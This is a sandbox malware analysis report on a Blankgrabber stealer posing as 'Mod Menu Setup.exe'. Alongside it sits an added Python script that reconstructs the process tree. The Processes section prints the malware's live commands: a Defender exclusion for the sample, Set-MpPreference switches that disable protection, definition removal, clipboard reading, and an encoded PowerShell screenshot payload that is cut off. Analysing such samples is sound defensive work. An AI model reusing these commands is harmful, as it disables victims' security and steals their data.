Malware Analysis Report

2024-10-16 07:19

Sample ID: 240624-1lmb4atbmc
Target: Mod Menu Setup.exe
SHA256: dfdcf2fadb2e6614a4ddf5ae74472758603d027e38ddcc5339eabfb96aa9cc79
Tags: blankgrabber evasion execution spyware stealer upx
Score: 10/10


Analysis Overview

Score: 10/10
SHA256: dfdcf2fadb2e6614a4ddf5ae74472758603d027e38ddcc5339eabfb96aa9cc79
Threat level: Known bad (the file Mod Menu Setup.exe was classified as known bad)

Malicious Activity Summary

blankgrabber evasion execution spyware stealer upx

Blankgrabber family

A stealer written in Python and packaged with PyInstaller

Deletes Windows Defender Definitions

Command and Scripting Interpreter: PowerShell

UPX packed file

Loads dropped DLL

Reads user/profile data of web browsers

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Enumerates physical storage devices

Detects videocard installed

Enumerates processes with tasklist

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Gathers system information

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1

Detonation Overview

Reported: 2024-06-24 21:44

Signatures

A stealer written in Python and packaged with PyInstaller

Description Indicator Process Target
(static match only: no description, indicator, process or target recorded)

Blankgrabber family

blankgrabber

Analysis: behavioral1

Detonation Overview

Submitted: 2024-06-24 21:44
Reported: 2024-06-24 22:15
Platform: win10-20240404-en
Max time kernel: 315s
Max time network: 1587s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI33762\rar.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
52 matches, none with a description, indicator, process or target recorded (all fields N/A)

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3376 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe
PID 3376 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe
PID 4276 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 1848 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1848 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4532 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4532 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4276 wrote to memory of 3812 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 3812 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 3812 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3812 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3912 wrote to memory of 3880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3912 wrote to memory of 3880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4572 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4572 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3416 wrote to memory of 2836 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3416 wrote to memory of 2836 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3000 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 3000 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 5100 wrote to memory of 4248 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5100 wrote to memory of 4248 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4236 wrote to memory of 4036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4236 wrote to memory of 4036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4276 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4532 wrote to memory of 4224 N/A C:\Windows\system32\cmd.exe C:\Program Files\Windows Defender\MpCmdRun.exe
PID 4532 wrote to memory of 4224 N/A C:\Windows\system32\cmd.exe C:\Program Files\Windows Defender\MpCmdRun.exe
PID 3576 wrote to memory of 2344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3576 wrote to memory of 2344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 2604 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 2604 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4276 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4036 wrote to memory of 4504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4036 wrote to memory of 4504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3700 wrote to memory of 4964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3700 wrote to memory of 4964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4276 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 3200 wrote to memory of 5068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3200 wrote to memory of 5068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4276 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 1856 wrote to memory of 4312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1856 wrote to memory of 4312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4504 wrote to memory of 220 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4504 wrote to memory of 220 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
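The WriteProcessMemory rows above are the parent/child relationships of the detonation (each pair is listed twice in the report). As an added example that is not part of this report, the following Python script parses a subset of those rows copied from the table, collapses the duplicates, and prints the process tree and the ancestry of MpCmdRun.exe. The row layout it assumes ("PID <parent> wrote to memory of <child> N/A <parent image> <child image>") and the regular expression are this example's own.

```python
"""Rebuild a process tree from the "Suspicious use of WriteProcessMemory" rows
of a sandbox report.

Added example; it is not part of the sandbox report. ROWS is a subset of the
report's own table (the sandbox lists each parent/child pair twice, which the
parser collapses); the row layout assumed here is
"PID <parent> wrote to memory of <child> N/A <parent image> <child image>".
"""
import re
from collections import defaultdict

ROWS = r"""
PID 3376 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe
PID 3376 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe
PID 4276 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 1848 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4532 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4276 wrote to memory of 3812 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 3812 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4276 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4532 wrote to memory of 4224 N/A C:\Windows\system32\cmd.exe C:\Program Files\Windows Defender\MpCmdRun.exe
PID 4532 wrote to memory of 4224 N/A C:\Windows\system32\cmd.exe C:\Program Files\Windows Defender\MpCmdRun.exe
PID 4236 wrote to memory of 4036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4036 wrote to memory of 4504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4504 wrote to memory of 220 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
"""

# Both image paths may contain spaces ("Mod Menu Setup.exe"), so split on the
# " C:\" boundary rather than on whitespace.
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (C:\\.+?) (C:\\.+)$")


def parse_rows(text):
    """Return {(parent_pid, child_pid): (parent_image, child_image)}, de-duplicated."""
    edges = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            ppid, cpid, pimg, cimg = m.groups()
            edges[(int(ppid), int(cpid))] = (pimg, cimg)
    return edges


def build_tree(edges):
    """Return (children, parent, image); image maps pid -> executable basename."""
    children, parent, image = defaultdict(list), {}, {}
    for (ppid, cpid), (pimg, cimg) in edges.items():
        children[ppid].append(cpid)
        parent[cpid] = ppid
        image.setdefault(ppid, pimg.rsplit("\\", 1)[-1])
        image[cpid] = cimg.rsplit("\\", 1)[-1]
    return children, parent, image


def roots(children, parent):
    """PIDs that spawn others but were not spawned by anything in the table."""
    return sorted(p for p in children if p not in parent)


def ancestry(parent, image, pid):
    """Chain from the root down to pid, e.g. who ultimately launched MpCmdRun.exe."""
    chain = [pid]
    while chain[-1] in parent:
        chain.append(parent[chain[-1]])
    return [f"{p} {image[p]}" for p in reversed(chain)]


def render(children, image, pid, depth=0, out=None):
    """Indented one-line-per-process view of the subtree rooted at pid."""
    out = [] if out is None else out
    out.append("  " * depth + f"{pid} {image[pid]}")
    for child in sorted(children.get(pid, [])):
        render(children, image, child, depth + 1, out)
    return out


if __name__ == "__main__":
    children, parent, image = build_tree(parse_rows(ROWS))
    for root in roots(children, parent):
        print("\n".join(render(children, image, root)))
    print("MpCmdRun.exe lineage:", " > ".join(ancestry(parent, image, 4224)))
```

The single root is the first Mod Menu Setup.exe (PID 3376), which re-launches itself (PID 4276, the usual PyInstaller onefile bootloader behaviour that also explains the _MEI33762 extraction directory in the Files section) and then fans out through one cmd.exe per command to powershell.exe, tasklist.exe, WMIC.exe and MpCmdRun.exe. The csc.exe and cvtres.exe pair under powershell.exe 4036 is the Add-Type compilation of the screenshot class.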

Processes

C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe"

C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAByAGUAcwB1AGwAdABzAC4AQQBkAGQAKAAoAEIAaQB0AG0AYQBwACkAYgBpAHQAbQBhAHAALgBDAGwAbwBuAGUAKAApACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABjAGEAdABjAGgAIAAoAEUAeABjAGUAcAB0AGkAbwBuACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAALwAvACAASABhAG4AZABsAGUAIABhAG4AeQAgAGUAeABjAGUAcAB0AGkAbwBuAHMAIABoAGUAcgBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoADQAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgAHIAZQBzAHUAbAB0AHMAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAiAEAADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgACQAcwBvAHUAcgBjAGUAIAAtAFIAZQBmAGUAcgBlAG4AYwBlAGQAQQBzAHMAZQBtAGIAbABpAGUAcwAgAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAsACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAA0ACgANAAoAJABzAGMAcgBlAGUAbgBzAGgAbwB0AHMAIAA9ACAAWwBTAGMAcgBlAGUAbgBzAGgAbwB0AF0AOgA6AEMAYQBwAHQAdQByAGUAUwBjAHI